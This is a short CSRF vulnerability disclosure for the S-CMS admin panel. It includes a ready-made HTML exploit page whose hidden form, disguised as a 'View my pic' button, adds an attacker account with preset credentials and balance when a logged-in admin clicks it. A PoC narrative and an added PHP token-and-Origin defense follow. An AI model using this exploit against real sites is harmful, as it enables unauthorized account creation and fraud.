Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip
CSRF Exp:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
</head>
<body>
<center><h1>fake request</h1></center>
<div>
<form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">
<input type="hidden" name="M_login" value="hacker">
<input type="hidden" name="M_pwd" value="hacker">
<input type="hidden" name="M_money" value="10000">
<input type="hidden" name="M_fen" value="0">
<input type="hidden" name="M_name" value="1">
<input type="hidden" name="M_email" value="g@gmail.com">
<input type="hidden" name="M_qq" value="132">
<input type="hidden" name="M_add" value="x">
<input type="hidden" name="M_mobile" value="11111111111">
<input type="hidden" name="M_code" value="xxxx">
<input type="submit" value="View my pic">
</form>
</div>
</body>
</html>
PoC:
There were four users before the administrator clicked the link.
When the administrator, while logged in, opened the fake page and clicked the button, a request was sent.
A new user was created after the request.
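A defensive counterpart to the form above, as an added example that is not part of the original post or of S-CMS: a per-session token plus an Origin check of the kind a handler such as `ajax.php` could run before acting on `action=add`. The helper names `csrf_token()` and `csrf_check()`, the `csrf_token` field name and the sample requests are assumptions made for this illustration.

```php
<?php
// Added example, not S-CMS code: csrf_token() and csrf_check() are hypothetical helpers.

// Issue one random token per session; each admin form embeds it as a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Allow a state-changing request only when it is a POST, its Origin header
// (if the browser sent one) is the site itself, and it carries the session token.
function csrf_check(array $server, array $post, array $session, string $siteOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? '';
    if ($origin !== '' && $origin !== $siteOrigin) {
        return false;
    }
    $expected = $session['csrf'] ?? '';
    $sent = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty session token never matches.
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Constructed demo data: plain arrays stand in for $_SESSION, $_SERVER and $_POST.
$session = [];
$site    = 'http://127.0.0.1';
$token   = csrf_token($session);
$fields  = ['M_login' => 'newuser', 'M_pwd' => 'constructed-password', 'M_money' => '0'];

$cases = [
    'cross-site form, no token' => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other-site.example'], $fields],
    'same-origin, no token'     => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site], $fields],
    'same-origin, valid token'  => [['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $site], $fields + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$server, $post]) {
    // In a real handler this check would run before the action=add branch.
    echo $label, ': ', csrf_check($server, $post, $session, $site) ? 'accepted' : 'rejected', PHP_EOL;
}
```

Marking the admin session cookie `SameSite=Lax` or `Strict` adds a second layer, because the browser then withholds the cookie from cross-site POSTs like the one in the form above.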